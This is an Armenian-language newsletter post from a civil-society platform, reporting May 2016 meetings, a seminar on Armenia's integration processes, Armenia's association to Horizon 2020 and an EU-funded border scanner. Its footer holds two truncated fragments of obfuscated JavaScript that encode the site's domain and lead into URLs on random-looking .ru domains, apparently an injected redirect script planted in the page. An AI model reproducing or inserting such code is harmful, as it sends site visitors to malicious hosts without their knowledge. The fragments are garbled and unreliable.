Թողարկում 243

CSF_Armenia_logo_ARMՔՀՖ ՀԱՊ ընթացիկ նորություններ

2016 թվականի մայիսի 10-ին Եվրասիա համագործակցություն հիմնադրամի (ԵՀՀ) գրասենյակում տեղի ունեցավ ԱլԳ ՔՀՖ ՀԱՊ պատվիրակների բաց համաժողով։ Օրակարգում ԱլԳ ՔՀՖ ՀԱՊ պատվիրակների ժողովի անդամների կողմից փակ գաղտնի քվեարկությամբ ԱլԳ Քաղաքացիական հասարակության ֆորումի՝ 2016թ. նոյեմբերի 28-30-ին Բրյուսելում կայանալիք 8-րդ տարեկան համաժողովի Հայաստանի պատվիրակների թեկնածուների կարճ ցուցակ կազմելն էր: Տեղի ունեցան ընտրություններ եւ ամփոփվեցին արդյունքները:

***

2016 թվականի մայիսի 16-ին ԵՀՀ գրասենյակում տեղի ունեցավ ԱլԳ ՔՀՖ Հայաստանի ազգային պլատֆորմի պատվիրակների ժողով, որի օրակարգում ՀԱՊ կազմակերպական սկզբունքներում փոփոխություններ եւ լրացումներ կատարելն էր: Մասնակիցները ներկայացրին իրենց առաջարկությունները, տեղի ունեցավ քննարկում մի շարք կետերի շուրջ։ Որոշվեց ստեղծել աշխատանքային խումբ, որը կքննարկի եւ կհամակարգի ստացված առաջարկությունները եւ ՀԱՊ կազմակերպական սկզբունքների  փոփոխված տարբերակը կներկայացնի ՀԱՊ հաստատմանը։

 

european-commission-flagՍեմինար նվիրված ՀՀ ինտեգրացիոն գործընթացների վրա տարածաշրջանային զարգացումների ազդեցությանը

13241509_10156835953235184_868932489_o (1)Մայիսի 13-15, 2016թ. Աղվերանում տեղի ունեցավ  «Տարածաշրջանային զարգացումները եւ դրանց անդրադարձը ՀՀ ինտեգրացիոն գործընթացների վրա» թեմայով սեմինար, որը կազմակերպել էր Երեւանի մամուլի ակումբը՝ Ֆրիդրիխ Էբերտ հիմնադրամի հայաստանյան գրասենյակի աջակցությամբ։ Ողջույնի խոսքով հանդես եկավ Ֆրիդրիխ Էբերտ հիմնադրամի հայաստանյան գրասենյակի ղեկավար Նաիրա Գեւորգյան, որը ներկայացրեց հիմնադրամի գործունեությունը Հարավային Կովկասում՝ ընդգծելով ՀՀ ինտերգրացիոն գործընթացների շուրջ հանրային քննարկումների կարեւորությունը։IMG_323513242117_10156835953225184_501321121_o

Սեմինարին զեկուցումներով հանդես եկան ՀՀ ԱԺ պատգամավոր Խաչատուր Քոքոբելյանը ( «Հայաստանի ԵԱՏՄ անդամակցության հեռանկարները») եւ Էդմոն Մարուքյանը  («ՀՀ Անվտանգության մարտահրավերները երկրի ինտեգրացիոն գործընթացների համատեքստում»)։13214836_10156835998715184_1681302180_o

Գրող, հրապարակախոս Վահրամ Մարտիրոսյանի զեկուցումը նվիրված էր «Եվրոպական արժեքների շուրջ բանավեճը՝ ինքնին եվրոպական արժեք» թեմային։

«Աշխարհաքաղաքական զարգացումների վերաբերյալ հանրային տրամադրությունների փոփոխությունը եւ դրա ազդեցությունը երկրի արտաքին քաղաքական կողմնորոշումներում» թեմայով  զեկուցմամբ հանդես եկավ հրապարակախոս Զարուհի Հովհաննիսյանը։

IMG_0198-768x509

ԱլԳ ՔՀՖ Հայաստանի ազգային համակարգող  Միքայել Հովհաննիսյանը սեմինարի մասնակիցներին  ծանոթացրեց ԱլԳ ՔՀՖ շրջանակներում ընթացող արդի զարգացումներին, իսկ Երեւանի մամուլի ակումբի նախագահ Բորիս Նավասարդյանը խոսեց  այն մասին, թե ԶԼՄ-ներն ինչպես են լուսաբանում ինտեգրացիոն գործընթացների շուրջ առկա բանավեճը։

 

 

EuropAid logo_en

Հայաստանը միանում է «Հորիզոն 2020»-ին՝ համագործակցելու ԵՄ-ի հետ հետազոտությունների եւ նորարարության ոլորտներում 

Բրյուսել, 19 մայիսի 2016թ

 Մամուլի հաղորդագրություն

Հայաստանի հետազոտությունների ու նորարարության ոլորտի ներկայացուցիչներն արդեն հնարավորություն կստանան օգտվելու Հորիզոն 2020–ից՝ հետազոտությունների եւ նորարության ֆինասավորման ԵՄ ծրագրից, նույն՝ ԵՄ անդամ պետությունների եւ ծրագրին  ասոցիացված մյուս գործընկեր երկրների համար նախատեսված պայմաններով:

 HorizonՀայաստանը «Հորիզոն 2020»-ին ասոցիացնող Համաձայնագիրը ստորագրվեց այսօր Եվրոպական հանձնաժողովի հետազոտության, գիտության եւ նորարարության հանձնակատար Կարլոս Մոեդասի եւ ՀՀ կրթության  եւ գիտության  նախարար Լեւոն Մկրտչյանի կողմից:

«ԵՄ հետազոտությունների, գիտության եւ նորարարության ոլորտի համագործակցությունը բաց է աշխարհի առաջ: Հայաստանը 16-րդ երկիրն է, որը ասոցացվում է Հորիզոն 2020-ին՝  հետազոտությունների եւ նորարարության ոլորտի հանրային ֆինանսավորման աշխարհի խոշորագույն ծրագրին: Այն կբերի նոր եւ տարբերվող հմտությունների ու գաղափարների ներհոսք եւ կնպաստի հետազոտությունների ուղղությամբ միջազգային համագործակցության զարգացմանը»,- նշեց ԵՄ հանձնակատար Մոեդասը

horizon_2020_1«Հորիզոն 2020-ի միջոցով Հայաստանի հետազոտական ինստիտուտներն ու մասնավոր հատվածը  հնարավորություն կունենան առաջավոր հետազոտական եւ զարգացմանն ուղղված նախագծերի իրականացման ֆինանսավորում ստանալ: Հորիզոն 2020-ի բացումը Հայաստանի համար վառ օրինակ է առ այն, որ  ԵՄ-ն հանձնառու է  առավել ընդլայնելու   Հայաստանի հետ հարաբերությունները»,- նշեց Եվրոպական հարեւանության քաղաքականության եւ ընդլայնման բանակցությունների հանձնակատար Յոհաննես Հաանը:

Համաձայնագիրը Հայաստանին թույլ է տալիս առավել ընդլայնել Եվրոպական միության հետ համագործակցությունը  հաջողակ ու արդիական տնտեսությունների համար կենսական նշանակություն ունեցող հետազոտությունների եւ նորարարության ուղղություններով: Այն ցույց է տալիս Եվրոպական միության հանձնառությունը՝ նպաստելու իր գործընկերների՝ ծրագրին ասոցացված երկրների գիտական եւ նորարարական կարողությունների զարգացմանը:  Այն եւս մեկ քայլ է՝ հետազոտությունների եւ նորարարության ոլորտը աշխարհի առաջ բացելու՝ ԵՄ-ն  նպատակին ընդառաջ:

Մինչեւ այժմ Հայաստանը մասնակցել է Հորիզոն 2020-ին միայն երրորդ երկրների շարքում: Դա նշանակում է, որ Հայաստանի սուբյեկտները չեն պահպանել ծրագրի իրականացման համար  պահանջվող մասնակիցների նվազագույն քանակը եւ չեն օգտվել ծրագրի մի շարք կարեւոր բաղադրիչներից, որոնցից է նորարարական բիզնեսների  աջակցությունը: ՀՀ ներկայացուցիչները չեն ունեցել մուտք դեպի քաղաքական ուղղությունների պատասխանատու առանցքային գերատեսչություններ:

Համաձայնագրի շնորհիվ, ՀՀ հետազոտական ինստիտուտները, համալսարաններն ու անհատ հետազոտողները կկարողանան օգտվել Հորիզոն 2020-ի կողմից տրամադրվող բոլոր հնարավորություններից ամենատարբեր ոլորտներում՝ հիմնարար գիտական բնագավառից  մինչեւ ցուցադրական նախագծեր, նույն՝  ԵՄ անդամ պետությունների եւ ծրագրին ասոցացված գործընկեր մյուս երկրների  կազմակերպությունների եւ անհատ հետազոտողների համար նախատեսված պայմաններով: Հայաստանյան ՓՄՁ-ներն ու մասնավոր սուբյեկտները նույնպես հնարավորություն կունենան օգտվելու ընդլայնված աջակցությունից՝ նոր գաղափարներ մշակելու եւ նոր արտադրատեսակներ եւ ծառայություններ շուկա ներմուծելու նպատակով:

Ընդհանուր տեղեկություններ

«Հորիզոն 2020»-ը հետազոտություններին ու նորարարությանը նվիրված խոշորագույն  բազմազգ ծրագիր է, որի 2014-2020 թվականների համար նախատեսված բյուջեն  կազմում է 77 մլրդ եվրո: Մինչեւ այժմ Հայաստանը մասնակցել է Հորիզոն 2020-ին միայն երրորդ երկրների շարքում: Ասոցացման ժամանակաշրջանն ընդգրկում է 2016-2020 թվականները՝ նոր հնարավորություններ բացելով երկրի համալսարանների, հետազոտական ինստիտուտների եւ ձեռնարկությունների առջեւ:

Հորիզոն 2020-ին նախորդող՝ 2013-2017 թվականների Յոթերորդ շրջանակային ծրագրով հայաստանյան կազմակերպությունները մասնակցել են 35 ստորագրված նախագծերում: Հորիզոն 2020-ի շրջանակներում Հայաստանն արդեն իսկ հանդիսանում է հինգ նախագծերի մասնակից:  

ԵՄ-ն լուրջ աջակցություն է տրամադրում՝  Հայաստանին  հատկացնելով 140-170 մլն եվրո 2014-2017 թվականների «Միասնական աջակցության շրջանակային փաստաթղթի» հաշվին: Աջակցության հիմնական ուղղություններն են մասնավոր հատվածի զարգացումը, հանրային կառավարման ոլորտի բարեփոխումները եւ արդարադատությունը: Տրամադրվում է լրացուցիչ աջակցություն ԵՄ-Հայաստան համաձայնագրերի,  օրինակ՝  Հորիզոն 2020-ի, իրականացման նպատակով եւ քաղաքացիական հասարակության ուղղությամբ:

Georgia-Armenia

ԵՄ-ն  աջակցում է Հայաստանի եւ Վրաստանի միջեւ բաց եւ անվտանգ սահմաններ ունենալուն

19.05.2016

cq5dam.web.540.390Հարավային Կովկասում սահմանների ինտեգրված կառավարմանն աջակցելուն ուղղված ԵՄ նախաձեռնության շրջանակներում հայ-վրացական սահմանի Սադախլոյի անցակետում տեղադրվել է բեռնատար ավտոմեքենաների ստուգում իրականացնող ԱՄՆ 1.5 միլիոն դոլարանոց սկաներ։ Այն կօգնի կատարելագործել  բեռների ստուգման գործընթացը, արդյունավետ կերպով դիտարկել հարկացուցակները եւ ի հայտ բերել մաքսանենգության դեպքերը,- հայտնում է Միավորված ազգերի կազմակերպության Զարգացման ծրագիրը (ՄԱԿԶԾ), որն էլ իրականցնում է ԵՄ կողմից ֆինանսավորվող այս նախագիծը։

«Եվրամիությունը ողջունում է սահմանների կառավարման ոլորտում Վրաստանի ձեռքբերումները։ Այդ ամենը հնարավոր է դարձել Վրաստանի քաղաքացիների համար վիզային ռեժիմի ազատականացման եւ առանց վիզայի ռեժիմ սահմանելուն ուղղված գործողությունների արդյունքում»,- նշել է Վրաստանում ԵՄ դեսպան Յանոշ Հերմանը։   «Մեր օժանդակությունը հավելյալ աջակցություն է բարեփոխումների ընթացիկ ծրագրին, որով սահմանների կառավարումը դառնալու է ավելի արդյունավետ եւ վերահսկելի»,- հավելել է նա։

ԵՄ եւ ՄԱԿԶԾ համատեղ նախաձեռնությունը 4.3 մլն ընդհանուր բյուջեով, օգնում է Հայաստանի եւ Վրաստանի կառավարություններին՝ առավել արդյունավետ կերպով լուծել մաքսանենգության եւ անօրինական բեռնափոխադրումների հետ կապված պրոբլեմները, նպաստել սարքավորումների տեղադրման, մաքսային եւ սահմանապահ ծառայությունների աշխատակիցների վերապատրաստման,  ինչպես նաեւ երկու երկրների սահմանապահ ծառայությունների մասնագիտական համագործակցության խթանմանը։ Եվրամիությունը եւ ՄԱԿԶԾ Վրաստանի կառավարությանն օգնել են նաեւ Վրաստանի սահմանների կառավարման 2014-2018թթ. Ազգային ռազմավարական ծրագրի ընդունմանը։( ԵՀԳԳ տեղեկատվական կենտրոն)

Մանրամասներ

Մամուլի հաղորդագրություն

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “eaparmenianews.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "eaparmenianews.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

Advertisements
This entry was posted in Հայերեն. Bookmark the permalink.